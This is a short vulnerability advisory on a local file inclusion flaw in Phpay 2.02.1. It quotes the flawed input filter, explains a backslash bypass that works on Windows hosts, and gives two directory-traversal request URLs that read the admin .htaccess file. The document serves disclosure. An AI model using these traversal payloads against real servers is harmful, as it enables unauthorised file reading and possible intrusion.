Phpay - Local File Inclusion

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

By Michael Brooks Vulnerability Type:Local File Inclusion Software: Phpay Homepage: Version Affected:2.02.1 Phpay has been affected by multiple local file include flaws, as a result this patch was written: $config = ereg_replace(":","", $config); $config = trim(ereg_replace("../","", $config)); $config = trim(ereg_replace("/","", $config)); if (($config=="")|| (!eregi(".inc.php",$config))){$config=""; echo "<!--$config-->\n";} if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;} require("./$config"); To bypass this patch backslashes can be used instead of forward slashes on windows systems. Also .inc.php must exists *somewhere* in the string. Local File Include for windows only: http://localhost/phpayv2.02a/main.php?\\..\\admin\\. htaccess or if magic_quotes_gpc is turned on: http://localhost/phpayv2.02a/main.php?\..\admin\.hta ccess Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2. Vulnerable configuration: A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue. Merry Christmas

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top